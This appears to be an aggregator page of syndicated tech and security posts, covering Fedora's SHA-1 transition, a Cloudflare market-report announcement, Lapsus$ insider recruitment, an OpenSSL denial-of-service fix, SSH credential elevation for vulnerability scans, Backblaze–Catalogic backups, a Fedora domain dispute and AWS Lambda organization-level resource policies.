



Post Syndicated from original https://xkcd.com/2594/

Post Syndicated from original https://lwn.net/Articles/887832/

Disruptive changes are not much fun for anyone involved, though they may be necessary at times. Moving away from the SHA-1 hash function, at least for cryptographic purposes, is probably one of those necessary disruptive changes. There are better alternatives to SHA-1, which has been “broken” from a cryptographic perspective for quite some time now, and most of the software components that make up a distribution can be convinced to use other hash functions. But there are still numerous hurdles to overcome in making that kind of switch, as a recent discussion on the Fedora devel mailing list shows.

Post Syndicated from Vivek Ganti original https://blog.cloudflare.com/idc-marketscape-cdn-leader-2022/

We are thrilled to announce that Cloudflare has been positioned in the Leaders category in the IDC MarketScape: Worldwide Commercial CDN 2022 Vendor Assessment (doc #US47652821, March 2022).

You can download a complimentary copy here.

The IDC MarketScape evaluated 10 CDN vendors based on their current capabilities and future strategies for delivering Commercial CDN services. Cloudflare is recognized as a Leader.

At Cloudflare, we release products at a dizzying pace. When we talk to our customers, we hear again and again that they appreciate Cloudflare for our relentless innovation. In 2021 alone, over the course of seven Innovation Weeks, we launched a diverse set of products and services that made our customers’ experiences on the Internet even faster, more secure, more reliable, and more private.

We leverage economies of scale and network effects to innovate at a fast pace. Of course, there’s more to our secret sauce than our pace of innovation. In the report, IDC notes that Cloudflare is “a highly innovative vendor and continues to invest in its competencies to support advanced technologies such as virtualization, serverless, AI/ML, IoT, HTTP3, 5G and (mobile) edge computing.” In addition, IDC also recognizes Cloudflare for its “integrated SASE offering (that) is appealing to global enterprise customers.”

Building fast scalable applications on the modern Internet requires more than just caching static content on servers around the world. Developers need to be able to build applications without worrying about underlying infrastructure. A few years ago, we set out to revolutionize the way applications are built, so developers didn’t have to worry about scale, speed, or even compliance. Our goal was to let them build the code, while we handle the rest. Our serverless platform, Cloudflare Workers, aimed to be the easiest, most powerful, and most customizable platform for developers to build and deploy their applications.

Workers was designed from the ground up for an edge-first serverless model. Cloudflare started with a distributed edge network rather than trying to push compute out from large centralized data centers to the edge, and working under those constraints forced us to innovate.

Today, Workers serves hundreds of thousands of developers, ranging from hobbyists to enterprises all over the world, handling millions of requests per second.

According to the IDC MarketScape: “The Cloudflare Workers developer platform, based on an isolate serverless architecture, is highly customizable and provides customers with a shortened time to market which is crucial in this digitally led market.”



Our customers today have access to extensive analytics on the dashboard and via the API around network performance, firewall actions, cache ratios, and more. We provide analytics based on raw events, which means that we go beyond simple metrics and provide powerful filtering and analysis capabilities on high-dimensionality data.

And our insights are actionable. For example, customers who are looking to optimize cache performance can analyze specific URLs and see not just hits and misses but content that is expired or revalidated (indicating a short TTL). All events, both directly in the console and in the logs, are available within 30 seconds.

The IDC MarketScape notes that the “self-serve portal and capabilities that include dashboards with detailed analytics as well as actionable content delivery and security analytics are complemented by a comprehensive enhanced services suite for enterprise grade customers.”



Cloudflare’s SASE offering, Cloudflare One, continues to grow and provides a unified and comprehensive solution to our customers. With our SASE offering, we aim to be the network that any business can plug into to deliver the fastest, most reliable, and most secure experiences to their customers. Cloudflare One combines network connectivity services with Zero Trust security services on our purpose-built global network.

Cloudflare Access and Gateway services natively work together to secure connectivity for any user to any application and Internet destination. To enhance threat and data protection, Cloudflare Browser Isolation and CASB services natively work across both Access and Gateway to fully control data in transit, at rest, and in use.

The old model of the corporate network has been made obsolete by mobile, SaaS, and the public cloud. We believe Zero Trust networking is the future, and we are proud to be enabling that future. The IDC MarketScape notes: “Cloudflare’s enterprise security Zero Trust services stack is extensive and meets secure access requirements of the distributed workforce. Its data localization suite and integrated SASE offering is appealing to global enterprise customers.”

Many global companies looking to do business in China today are often restricted in their operations due to the country’s unique regulatory, political, and trade policies.

Core to Cloudflare’s mission of helping build a better Internet is making it easy for our customers to improve the performance, security, and reliability of their digital properties, no matter where in the world they might be, and this includes mainland China. Our partnership with JD Cloud & AI allows international businesses to grow their online presence in China without having to worry about managing separate tools with separate vendors for security and performance in China.

Just last year, we made advancements that allow customers to serve their DNS in mainland China. This means DNS queries are answered directly from one of the JD Cloud Points of Presence (PoPs), leading to faster response times and improved reliability. This is in addition to providing DDoS protection, WAF, serverless compute, SSL/TLS, and caching services from more than 35 locations in mainland China.

Here’s what the IDC MarketScape noted about Cloudflare’s China network: “Cloudflare’s strategic partnership with JD Cloud enables the vendor to provide its customers cached content in-country at any of their China data centers from origins outside of mainland China and provide the same Internet performance, security, and reliability experience in China as the rest of the world.”

One of the earliest architectural decisions we made was to run the same software stack of our services across our ever-growing fleet of servers and data centers. So whether it is content caching, serverless compute, zero trust functionality, or our other performance, security, or reliability services, we run them from all of our physical points of presence. This also translates into faster performance and robust security policies for our customers, all managed from the same dashboard or APIs. This strategy has been a key enabler for us to expand our customer base significantly over the years. Today, Cloudflare’s network spans 250 cities across 100+ countries and has millions of customers, of which more than 140,000 are paying customers.

In the IDC MarketScape: Worldwide Commercial CDN 2022 Vendor Assessment, IDC notes, “[Cloudflare’s] clear strategy to invest in new technology but also expand its network as well as its sales machine across these new territories has resulted in a tremendous growth curve in the past years.”

To that, we’d humbly like to say that we are just getting started.

Stay tuned for more product and feature announcements on our blog. If you’re interested in contributing to Cloudflare’s mission, we’d love to hear from you.

Post Syndicated from Jeremy Makowski original https://blog.rapid7.com/2022/03/15/cybercriminals-recruiting-effort-highlights-need-for-proper-user-access-controls/

The Lapsus$ ransomware gang’s modus operandi seems to be evolving. Following the recent data breaches of Nvidia and Samsung, on March 10, 2022, the Lapsus$ ransomware gang posted a message on their Telegram channel claiming that they were looking to recruit employees/insiders of companies in the telecommunications, software/gaming, call center/BPM, and server hosting industries.

This marks a departure from their previous attacks, which relied on phishing to gain access to victims’ networks. Now they are taking a more direct approach, actively recruiting employees who can provide them with VPN or Citrix access to corporate networks.

Additionally, the group appears to be taking requests. On March 6, 2022, Lapsus$ posted a survey on their Telegram channel asking people which victim’s source code they should leak next.

Following this survey, on March 12, 2022, the Lapsus$ ransomware gang posted a message on their Telegram channel in which they claimed to have hacked the source code of Vodafone Group. The next day, March 13, they posted another message saying that they were preparing the Vodafone data to leak.

The Lapsus$ ransomware gang calls on people to join their Telegram chat group or contact them by email at the following address: [email protected].

Generally, cybercriminal groups exploiting ransomware infect employee computers by using techniques such as phishing or Remote Access Trojans. However, the Lapsus$ ransomware gang’s bold new approach to target companies from within is concerning and shows their willingness to expand their capabilities and attack vectors.

As a result, we recommend that companies increase the vigilance they exercise regarding their internal security policy. Regardless of whether Lapsus$ recruiting tactics prove successful, they emphasize the need for proper user access control. It is critical to ensure that employees with access to the company network have only the security rights they require and not more.

To learn more about Rapid7’s role-based access control capabilities, check out Solving the Access Goldilocks Problem: RBAC for InsightAppSec Is Here.

Post Syndicated from original https://lwn.net/Articles/887970/

The OpenSSL project has disclosed a vulnerability wherein an attacker presenting a malicious certificate can cause the execution of an infinite loop. It is thus a denial-of-service vulnerability for any application (server or client) that handles certificates from untrusted sources. The OpenSSL 3.0.2 and 1.1.1n releases contain fixes for the problem. This advisory makes it clear that LibreSSL, too, suffers from this vulnerability; updated releases are available there as well.

Post Syndicated from Clare Holley original https://aws.amazon.com/blogs/architecture/building-your-brand-as-a-solutions-architect/

As AWS Solutions Architects, we use our business, technical, and people skills to help our customers understand, implement, and refine cloud-based solutions. We keep up-to-date with always-evolving technology trends and use our technical training to provide scalable, flexible, secure, and resilient cloud architectures that benefit our customers.

Today, each of us will examine how we’ve established our “brand” as Solutions Architects.

“Each of us has a brand, but we have to continuously cultivate and refine it to highlight what we’re passionate about to give that brand authenticity and make it work for us.” – Bhavisha Dawada, Enterprise Solutions Architect at AWS

We talk about our journeys as Solutions Architects and show you the specific skills and techniques we’ve sought out, learned, and refined to help set you on the path to success in your career as a Solutions Architect. We’ll share tips on how to establish yourself when you’re just starting out and how to move forward if you’re already a few years in.

As a Solutions Architect, there are many resources available to help you establish your brand. You can pursue specific training or attend workshops to develop your business and technical acumen. You’ll also have opportunities to attend or even speak at industry conferences about trends and innovation in the tech industry.

Learning, adapting, and constantly growing is how you’ll find your voice and establish your brand.

Bhavisha helps customers solve business problems using AWS technology. She is passionate about working in the field of technology and helping customers build and scale enterprise applications.

What helped her move forward in her career? “When I joined AWS, I had limited cloud experience and was overwhelmed by the quantity of services I had to learn in order to advise my customers on scalable, flexible, secure, and resilient cloud architectures.

To tackle this challenge, I built a learning plan for the areas I was interested in and wanted to go deeper in. AWS offers several resources to help you cultivate your skills, such as AWS blogs, AWS Online Tech Talks, and certifications to keep your skills updated and relevant.”

Jyoti is passionate about artificial intelligence and machine learning. She helps customers architect securely using cloud best practices.

What helped her move forward in her career? “Working closely with mentors and specialists helped me quickly ramp up with the necessary business and technical skills.

I also took part in shadow programs and speaking opportunities to further enhance my skills. My advice? Focus on your strengths, and then build a plan to work on where you’re not as strong.”

Clare helps customers achieve their business outcomes on their cloud journey. With more than 20 years of experience in the IT discipline, she helps customers build highly resilient and scalable architectures.

What helped her move forward in her career? “Coming from the database discipline, I wanted to learn more about helping customers with migrations. I took online courses and attended workshops on the various services to help our customers.

I went through a shadowing process to dive deeper into the services. Eventually, I was comfortable with the topics and even began conducting these workshops myself and providing support.

This can be a repeatable pattern. We are encouraged to experiment, learn, and iterate on new ways to meet and stay ahead of our customers’ needs. Identify realistic quarterly goals. Set aside time on your calendar to learn and be curious, since self-learning is essential for success.”

For women in tech, work-life balance is key. However career-driven you are, you also have a life beyond your job. It’s not always easy, but by maintaining a healthy boundary between work and life, you’ll likely be more productive.

Sujatha engages with customers to create innovative and secure solutions that address their business problems and accelerate the adoption of AWS services.

What helps her maintain a healthy work-life balance? “As a mother, a spouse, and a working woman, finding the right balance between family and work is important to me.

Expectations at work and with my family fluctuate, so I have to stay flexible. To re-prioritize my schedule, I analyze a task’s impact and reversibility and raise critical feedback before jumping into it. This allows me to control where I spend my time.

In this growing technology industry, we have innovative and improved ways to solve problems. I invest time to empower customers and team members to execute changes by themselves. This not only reduces the dependencies on me, it also helps to scale changes and realize benefits quickly.”

To continue to succeed as a Solutions Architect, in addition to technical and business knowledge, it is important to discuss ideas and learn from like-minded peers.

Clare highlights the importance of growing your network. “When I joined AWS, I looked into joining several affinity groups. These groups allow people who identify with a cause the opportunity to collaborate. They provide an opportunity for networking, speaking engagements, leadership and career growth opportunities, as well as mentorship. In these affinity groups, I met so many awesome women who inspired me to be authentic, honest, and push beyond my comfort zone.”

Women in tech have unfortunately experienced a lack of representation. Bhavisha says having connections in the field helped her feel less alone. “When I was interviewing for AWS, I networked with other women to know more about the company’s culture and learn about their journey at AWS. Learning about this experience helped me feel confident in my career choice.”

Pursue the AWS Certified Solutions Architect – Associate certification to build your technical skills. This certification validates your ability to design and deploy well-architected solutions on AWS that meet customer requirements.

We also encourage you to attend our virtual coffee events, which provide a unique opportunity to engage with AWS leaders, learn about career opportunities, and gain insight into our approach to serving customers.

Interested in applying for a Solutions Architecture role?

For more than a week we’re sharing content created by women. Check it out!

Post Syndicated from Crosstalk Solutions original https://www.youtube.com/watch?v=Q4zlrc0F4NU

Post Syndicated from Emmett Kelly original https://blog.rapid7.com/2022/03/15/insightvm-scanning-demystifying-ssh-credential-elevation/

Written in collaboration with Jimmy Cancilla

The credentials to log into the assets on the network are one of the most critical inputs that can be provided to a vulnerability assessment. In order to capture and report on the full risk of an asset, the scan engine must be able to access the asset so that it can collect vital pieces of information, such as what software is installed and how the system is configured. For UNIX and UNIX-like systems, access to a target is primarily achieved through the Secure Shell Protocol (SSH). Thus, scan engines accessing these systems should have access to the appropriate SSH credentials.

However, this raises the question: What are appropriate SSH credentials? In order for a vulnerability or policy assessment to provide accurate and comprehensive results, the scan engine should ideally be able to gain root-level access to the systems being assessed. Understandably, many security teams are wary about providing the scan engine with root credentials to all of their systems. Instead, security teams prefer to provide a non-root set of credentials that are capable of elevating to become root. In this context, credential elevation means logging into a system with one set of credentials that has fewer privileges and then elevating that credential to gain root-level privileges. In this way, IT administrators can provide service users that can be monitored and easily disabled if necessary.

In the next section, we will look at the different ways that credentials can be elevated.

The sudo command enables users to run commands with the security privileges of another user, which by default happens to be the root user (superuser). The ability to use the sudo command to elevate to root is a privilege that is provided by the system administrator. The administrator explicitly grants users (or groups) permission to use the sudo command — this is typically done by modifying the /etc/sudoers file on Linux-based systems.

The benefit of having access to the sudo command is that a user does not need to know the root password in order to gain root-level privileges. However, the user attempting to elevate to root-level privileges via sudo may still need to authenticate themselves by providing their own password. This is different from the behaviour of the su command, which will be discussed later.

What this means in terms of configuring sudo elevation in the Security Console is that the Permission Elevation Password on the “Add Credentials” page must be set to the password of the user attempting to elevate to root.

Like the sudo command, the su command enables users to run commands with the security privileges of another user, the default being to run the commands as the root user (superuser). However, unlike the sudo command, the su command typically does not require a system administrator to provide explicit permission to use the command. Instead, users can use the su command to switch to any other user on the system but must provide the password of the target user. The implication of this is that in order to use the su command to elevate to root-level privileges, the user must authenticate by providing the root password.

What this means in terms of configuring su elevation in the Security Console is that the Permission Elevation Password on the “Add Credentials” page must be set to the password of the root user.

If you have read the above sections on sudo and su, you may be asking yourself why you would need to combine the two commands. The answer comes down to a subtle but important difference between the two commands, namely the environmental context in which those commands are invoked. When using sudo to execute another command with root-level privileges, the command is run within the current user’s environment. This means that any environment-specific properties (for example, environment variables) are retained. When using su to execute another command with root-level privileges, su will invoke the default shell used by root and then run the command within that environment. This implies that any environment-specific properties loaded by default when logging into the root user will be set.

Given this explanation, combining the sudo and su commands provides a best of both worlds situation: It allows a user to elevate their privileges to root by providing their own user password, and it will execute the command within the context of the root environment (as opposed to the user’s environment). How does this work?

The first command executed is sudo, which will prompt the user to authenticate themselves by entering their own password. Then, the su command will be run. However, since it is running with root-level privileges, it won’t prompt for another password but instead will execute any commands within the context of the root environment. So to summarize, sudo+su allows for executing commands with root-level privileges within the context of root’s environment but without requiring knowledge of the root password.
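To make the three command shapes concrete, here is a minimal Python sketch that wraps a command for each method. The helper name `build_elevated_command` is hypothetical, and the flags are assumptions chosen for illustration (`sudo -S` to read the login user's password from stdin, `su - root -c` to start root's login shell). This is not how the scan engine actually invokes elevation, which the text does not describe.

```python
import shlex


def build_elevated_command(method: str, command: str) -> list[str]:
    """Wrap `command` so it runs with root-level privileges.

    Hypothetical helper for illustration only; not the scan engine's
    actual implementation.
    """
    if method == "sudo":
        # Runs as root without loading root's login environment.
        # -S tells sudo to read the *login user's* password from stdin.
        return ["sudo", "-S", "sh", "-c", command]
    if method == "su":
        # "su -" starts root's login shell, so root's environment is loaded.
        # su prompts for the *root* password.
        return ["su", "-", "root", "-c", command]
    if method == "sudo+su":
        # sudo authenticates with the login user's password; su then already
        # runs as root, so it does not prompt again, and "-" loads root's
        # environment before running the command.
        return ["sudo", "-S", "su", "-", "root", "-c", command]
    raise ValueError(f"unknown elevation method: {method!r}")


# Show the sudo+su form as a shell-quoted string.
print(shlex.join(build_elevated_command("sudo+su", "rpm -qa")))
# prints: sudo -S su - root -c 'rpm -qa'
```

The sudo+su form is simply the su form prefixed with sudo, which is why it needs only the user's password yet still ends up in root's environment.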

What this means in terms of configuring sudo+su elevation in the Security Console is that the Permission Elevation Password on the “Add Credentials” page must be set to the password of the user attempting to elevate to root.

Important note about sudo, su and sudo+su

The Permission Elevation User should be root. A common misconfiguration when configuring permission elevation is to set this value to the user’s own username. This leads to the scan engine logging in as the initial user, then using permission elevation to attempt to elevate to the same user! The credential status will be reported as successful, but the scan results will not be as accurate as those of a correctly configured scan with root permissions.
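A pre-scan check for this mistake might look like the following minimal sketch. `SshCredential` and `check_elevation_user` are hypothetical names that loosely mirror fields on the “Add Credentials” page; they are not part of any Rapid7 API.

```python
from dataclasses import dataclass


@dataclass
class SshCredential:
    """Hypothetical model of a few fields from the "Add Credentials" page."""
    username: str          # account the scan engine logs in with
    elevation_method: str  # e.g. "sudo", "su", "sudo+su", "pbrun"
    elevation_user: str    # Permission Elevation User


def check_elevation_user(cred: SshCredential) -> list[str]:
    """Return problems with the Permission Elevation User (empty list if none)."""
    problems: list[str] = []
    # The note above applies to sudo, su, and sudo+su.
    if cred.elevation_method not in ("sudo", "su", "sudo+su"):
        return problems
    if cred.elevation_user == cred.username:
        problems.append(
            "elevation user equals the login user; the credential may report "
            "success, but the scan will not run with root privileges"
        )
    elif cred.elevation_user != "root":
        problems.append(
            f"elevation user is {cred.elevation_user!r}; it should be 'root'"
        )
    return problems


print(check_elevation_user(SshCredential("scanner", "sudo", "scanner")))
```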

The pbrun command is a utility within the PowerBroker application provided by BeyondTrust. It works similarly to the sudo command in that it allows a user to elevate to root-level privileges without having to provide the root password.

Configuring privilege escalation with pbrun in the Security Console is fairly straightforward, as it does not require any additional passwords beyond the user’s password.

The Cisco Enable / Privileged Exec option allows a user to elevate to superuser-level privileges on certain Cisco devices using the enable command. Administrators of the Cisco devices must have configured an enable password to allow for privilege elevation.

What this means in terms of configuring Cisco Enable / Privileged Exec elevation in the Security Console is that the Permission Elevation Password on the “Add Credentials” page must be set to the Cisco Enable password configured on the devices.
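The password rules for each elevation method can be summarized as a small lookup. This is a hypothetical sketch: the `Elevation` enum and `elevation_password` function are illustrative names, not product identifiers. Treating pbrun as needing no separate elevation password is an interpretation of the statement that it requires no passwords beyond the user's own.

```python
from enum import Enum
from typing import Optional


class Elevation(Enum):
    """Elevation methods discussed above (names are illustrative)."""
    SUDO = "sudo"
    SU = "su"
    SUDO_SU = "sudo+su"
    PBRUN = "pbrun"
    CISCO_ENABLE = "cisco-enable"


def elevation_password(
    method: Elevation,
    user_password: str,
    root_password: Optional[str] = None,
    enable_password: Optional[str] = None,
) -> Optional[str]:
    """Return the value for the Permission Elevation Password field."""
    if method in (Elevation.SUDO, Elevation.SUDO_SU):
        # sudo (alone or in front of su) authenticates with the login user's password.
        return user_password
    if method is Elevation.SU:
        # su authenticates with the target (root) user's password.
        if root_password is None:
            raise ValueError("su elevation requires the root password")
        return root_password
    if method is Elevation.CISCO_ENABLE:
        # Cisco devices use the enable password configured by their administrators.
        if enable_password is None:
            raise ValueError("Cisco Enable elevation requires the enable password")
        return enable_password
    # pbrun: assumed to need nothing beyond the login user's own password.
    return None
```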

Elevation is critical to accurately assessing an asset for vulnerabilities and system configurations. There are several key pieces of information that can only be collected with root-level privileges. Improperly configuring credential elevation is one of the most common causes of inaccurate or incomplete assessment results. The following table outlines a few key operations and pieces of data that require root-level privileges. It is important to note that this is a non-exhaustive list of operations and data requiring root-level privileges – an exhaustive list would quickly become outdated as new data collection techniques are constantly being added to the product.

When it comes to vulnerability management, retrieving accurate and comprehensive results is paramount to mitigating risks within your organization. The most accurate data is collected when the scan engine has root-level access to the systems it is scanning. However, not all organizations may be in a position to provide the root password to these systems.

In this case, a best practice is to provide the vulnerability management software with a service account that is capable of elevating its permissions to root. This allows system administrators to more easily manage who is capable of elevating to root and, if necessary, revoke access. However, there are several different ways that an account can elevate its permissions. Each method comes with subtle but important differences. Understanding those differences is critical to ensuring that elevation to the correct level of permissions occurs successfully.

Post Syndicated from Natasha Rabinov original https://www.backblaze.com/blog/announcing-enhanced-ransomware-protection-with-backblaze-b2-catalogic/

The move to a virtualized environment is a logical step for many companies. Yet, physical systems are still a major part of today’s IT environments even as virtualization becomes more commonplace. With ransomware on the rise, backups are more critical than ever whether you operate a physical or virtual environment, or both.

Catalogic provides robust protection solutions for both physical and virtual environments. Now, through a new partnership, Backblaze B2 Cloud Storage integrates seamlessly with Catalogic DPX, Catalogic’s enterprise data protection software, and CloudCasa by Catalogic, Catalogic’s Kubernetes backup solution, providing joint customers with a secure, fast, and scalable backup target.

Join Troy Liljedahl, Solutions Engineer Manager at Backblaze, and William Bush, Field CTO at Catalogic Software, as they demonstrate how easy it is to store your backups in cloud object storage and protect them with Object Lock.

The partnership enables companies to:

“Backblaze and Catalogic together offer a powerful solution to provide cost-effective protection against ransomware and data loss. Instead of having to wait days to recover data from the cloud, Backblaze guarantees speed premiums with a 99.9% uptime SLA and no cold delays. We deliver high performance, S3-compatible, plug-n-play cloud object storage at a 75% lower cost than our competitors.”

—Nilay Patel, VP of Sales and Partnerships, Backblaze

The joint solution helps companies achieve immutability and compliance via Object Lock, ensuring backup and archive data can’t be deleted, overwritten, or altered for as long as the lock is set.

Catalogic Software is a modern data protection company providing innovative backup and recovery solutions including its flagship DPX product, enabling IT organizations to protect, secure, and leverage their data. Catalogic’s CloudCasa offers cloud data protection, backup, and disaster recovery as a service for Kubernetes applications and cloud data services.

“Our new partnership with Backblaze ensures the most common backup and restore challenges such as ransomware protection, exceeding backup windows, and expensive tape maintenance costs are a thing of the past. The Backblaze B2 Cloud Storage platform provides a cost-effective, long-term storage solution allowing data to remain under an organization’s control for compliance or data governance reasons while also considering the ubiquity of ransomware and the importance of protecting against an attack.”

—Sathya Sankaran, COO, Catalogic

Backblaze B2 Cloud Storage integrates seamlessly with Catalogic DPX and CloudCasa to accelerate and achieve recovery time and recovery point objectives (RTO and RPO) SLAs, from DPX agent-based server backups, agentless VM backups, or direct filer backups via NDMP.

After creating a Backblaze B2 account (if they don’t already have one), joint customers can select Backblaze B2 as their target backup destination in the Catalogic UI.

Join us for a webinar on March 23, 2022 at 8 a.m. PST to discover how to back up and protect your enterprise environments and Kubernetes instances—register here.

The post Announcing Enhanced Ransomware Protection with Backblaze B2 + Catalogic appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Post Syndicated from original https://lwn.net/Articles/887931/

Red Hat recently filed a request to have the domain name WeMakeFedora.org transferred from its current owner, Daniel Pocock, alleging trademark violations, bad faith, and more. The judgment that came back will not have been to the company’s liking:

The Panel finds that Respondent is operating a genuine, noncommercial website from a domain name that contains an appendage (“we make”) that, as noted in the Response, is clearly an identifier of contributors to Complainant’s website. In registering the domain name using an appendage that identifies Complainant’s contributors, Respondent is not attempting to impersonate Complainant nor misleadingly to divert Internet users. Rather, Respondent is using the FEDORA mark in the domain name to identify Complainant for the purpose of operating a website that contains some criticism of Complainant. Such use is generally described as “fair use” of a trademark.

The judgment concludes with a statement that this action was an abuse of the process.

Post Syndicated from Eric Johnson original https://aws.amazon.com/blogs/compute/using-organization-ids-as-principals-in-lambda-resource-policies/

This post is written by Rahul Popat, Specialist SA, Serverless, and Dhiraj Mahapatro, Sr. Specialist SA, Serverless.

AWS Lambda is a serverless compute service that runs your code in response to events and automatically manages the underlying compute resources for you. These events may include changes in state or an update, such as a user placing an item in a shopping cart on an ecommerce website. You can use AWS Lambda to extend other AWS services with custom logic, or create your own backend services that operate at AWS scale, performance, and security.

You may have multiple AWS accounts for your application development but want to keep a few common functions in one centralized account. For example, you might run a user authentication service in a centralized account and grant other accounts permission to access it using AWS Lambda.

Today, AWS Lambda launches improvements to resource-based policies that make it easier for you to control access to a Lambda function by using the identifier of your organization in AWS Organizations as a condition in your resource policy. The service expands the use of the resource policy to enable granting cross-account access at the organization level instead of granting explicit permissions for each individual account within an organization.

Before this release, the centralized account had to grant explicit permissions to every other AWS account that used the Lambda function, listing each account as a principal in the resource-based policy. While that remains a viable option, managing access for individual accounts this way becomes an operational burden as the number of accounts in your organization grows.

In this post, I walk through the details of the new condition and show you how to restrict access to only principals in your organization for accessing a Lambda function. You can also restrict access to a particular alias and version of the Lambda function with a similar approach.

For a Lambda function, you grant permissions with a resource-based policy that specifies the accounts and principals that can access the function and the actions they can perform on it. You can now use a new condition key, aws:PrincipalOrgID, in these policies to require that any principal accessing your Lambda function belongs to an account (including the management account) within an organization. For example, suppose you have a resource-based policy for a Lambda function and you want to restrict access to principals from AWS accounts in a particular AWS Organization. To do this, define the aws:PrincipalOrgID condition in the resource-based policy and set its value to your organization ID, which then determines who can access the function. Because the condition refers to the organization rather than to individual accounts, the policy automatically applies to new accounts you add to the organization, so you no longer need to update the policy every time you add an account.

Condition concepts

Before I introduce the new condition, let’s review the condition element of an IAM policy. A condition is an optional IAM policy element that you can use to specify special circumstances under which the policy grants or denies permission. A condition includes a condition key, operator, and value for the condition. There are two types of conditions: service-specific conditions and global conditions. Service-specific conditions are specific to certain actions in an AWS service. For example, the condition key ec2:InstanceType supports specific EC2 actions. Global conditions support all actions across all AWS services.

aws:PrincipalOrgID condition key

You can use this condition key to apply a filter to the principal element of a resource-based policy. You can use any string operator, such as StringLike, with this condition and specify the AWS organization ID as its value.

| Condition key | Description | Operators | Value |
| --- | --- | --- | --- |
| aws:PrincipalOrgID | Validates if the principal accessing the resource belongs to an account in your organization. | All string operators | Any AWS Organization ID |
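To make the difference between string operators concrete, here is a minimal Python sketch of how a StringEquals or StringLike condition could be evaluated against a request context. It is a simplified model, not AWS's policy engine: the helper names (`string_equals`, `string_like`, `condition_matches`) are hypothetical, and the sketch ignores `...IfExists` variants, multi-valued keys, and policy variables.

```python
import re


def string_equals(actual: str, expected: str) -> bool:
    """Case-sensitive exact match, as StringEquals performs."""
    return actual == expected


def string_like(actual: str, pattern: str) -> bool:
    """Case-sensitive match where '*' matches any run of characters and
    '?' matches exactly one character (simplified model of StringLike)."""
    regex = "".join(
        ".*" if ch == "*" else "." if ch == "?" else re.escape(ch)
        for ch in pattern
    )
    return re.fullmatch(regex, actual, flags=re.DOTALL) is not None


OPERATORS = {"StringEquals": string_equals, "StringLike": string_like}


def condition_matches(operator: str, key: str, expected: str, context: dict) -> bool:
    """Evaluate one condition; a key missing from the context never matches."""
    actual = context.get(key)
    if actual is None:
        return False
    return OPERATORS[operator](actual, expected)


context = {"aws:PrincipalOrgID": "o-sabhong3hu"}
print(condition_matches("StringEquals", "aws:PrincipalOrgID", "o-sabhong3hu", context))  # True
print(condition_matches("StringLike", "aws:PrincipalOrgID", "o-sab*", context))          # True
print(condition_matches("StringEquals", "aws:PrincipalOrgID", "o-other", context))       # False
```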

Once you have set up an organization and its accounts, the AWS Organizations console looks like this:

This example has two accounts in the AWS Organization: the Management Account and the MainApp Account. Make a note of the Organization ID shown in the left menu; you use it to set up a resource-based policy for the Lambda function.

Now you want to restrict the Lambda function’s invocation to principals from accounts that are members of your organization. To do so, write and attach a resource-based policy to the Lambda function:

```json
{
  "Version": "2012-10-17",
  "Id": "default",
  "Statement": [
    {
      "Sid": "org-level-permission",
      "Effect": "Allow",
      "Principal": "*",
      "Action": "lambda:InvokeFunction",
      "Resource": "arn:aws:lambda:<REGION>:<ACCOUNT_ID>:function:<FUNCTION_NAME>",
      "Condition": {
        "StringEquals": {
          "aws:PrincipalOrgID": "o-sabhong3hu"
        }
      }
    }
  ]
}
```
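If you manage several functions, you might generate this policy rather than writing it by hand. The sketch below uses a hypothetical helper, `build_org_invoke_policy`; the region, account ID (111122223333) and function name are illustrative placeholders, while the statement structure mirrors the policy above.

```python
import json


def build_org_invoke_policy(region: str, account_id: str, function_name: str, org_id: str) -> dict:
    """Return a resource-based policy letting any principal in org_id invoke the function."""
    return {
        "Version": "2012-10-17",
        "Id": "default",
        "Statement": [
            {
                "Sid": "org-level-permission",
                "Effect": "Allow",
                "Principal": "*",
                "Action": "lambda:InvokeFunction",
                "Resource": f"arn:aws:lambda:{region}:{account_id}:function:{function_name}",
                # Only principals whose account belongs to org_id satisfy this condition.
                "Condition": {"StringEquals": {"aws:PrincipalOrgID": org_id}},
            }
        ],
    }


policy = build_org_invoke_policy("us-east-1", "111122223333", "LogOrganizationEvents", "o-sabhong3hu")
print(json.dumps(policy, indent=2))
```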

In this policy, I specify Principal as *. This means that all users in the organization ‘o-sabhong3hu’ get function invocation permissions. If you specify an AWS account or role as the principal, then only that principal gets function invocation permissions, but only if they are also part of the ‘o-sabhong3hu’ organization.

Next, I add lambda:InvokeFunction as the Action and the ARN of the Lambda function as the resource to grant invoke permissions to the Lambda function. Finally, I add the new condition key aws:PrincipalOrgID and specify an Organization ID in the Condition element of the statement to make sure only the principals from the accounts in the organization can invoke the Lambda function.
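How Principal and the condition combine can be illustrated with a toy evaluator. This is a hypothetical, heavily simplified model (a single Allow statement, exact Action and Resource matches, StringEquals only); real IAM evaluation also considers explicit denies, wildcards, identity-based policies and service control policies. The account IDs and role names are made up.

```python
ARN = "arn:aws:lambda:us-east-1:111122223333:function:LogOrganizationEvents"

STATEMENT = {
    "Effect": "Allow",
    "Principal": "*",
    "Action": "lambda:InvokeFunction",
    "Resource": ARN,
    "Condition": {"StringEquals": {"aws:PrincipalOrgID": "o-sabhong3hu"}},
}


def principal_matches(principal, caller_arn: str) -> bool:
    # "*" matches any caller; {"AWS": "<arn>"} matches only that exact ARN.
    if principal == "*":
        return True
    return isinstance(principal, dict) and principal.get("AWS") == caller_arn


def statement_allows(statement: dict, action: str, resource: str, context: dict) -> bool:
    if statement.get("Effect") != "Allow":
        return False
    if statement.get("Action") != action or statement.get("Resource") != resource:
        return False
    if not principal_matches(statement.get("Principal"), context.get("aws:PrincipalArn", "")):
        return False
    # Every StringEquals entry must match the caller's request context.
    conditions = statement.get("Condition", {}).get("StringEquals", {})
    return all(context.get(key) == value for key, value in conditions.items())


member = {"aws:PrincipalArn": "arn:aws:iam::444455556666:role/MainApp", "aws:PrincipalOrgID": "o-sabhong3hu"}
outsider = {"aws:PrincipalArn": "arn:aws:iam::999988887777:role/Other", "aws:PrincipalOrgID": "o-someoneelse"}
print(statement_allows(STATEMENT, "lambda:InvokeFunction", ARN, member))    # True
print(statement_allows(STATEMENT, "lambda:InvokeFunction", ARN, outsider))  # False

# Naming a specific principal narrows access, but the org condition still applies.
scoped = {**STATEMENT, "Principal": {"AWS": member["aws:PrincipalArn"]}}
moved = {**member, "aws:PrincipalOrgID": "o-someoneelse"}
print(statement_allows(scoped, "lambda:InvokeFunction", ARN, member))  # True
print(statement_allows(scoped, "lambda:InvokeFunction", ARN, moved))   # False
```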

You can also use the AWS Management Console to create a resource-based policy. Open the Lambda function page and choose the Configuration tab. Select Permissions from the left menu, choose Add permissions, and fill in the required details. Scroll to the bottom, expand the Principal organization ID – optional section, enter your organization ID in the text box labeled PrincipalOrgID, and choose Save.
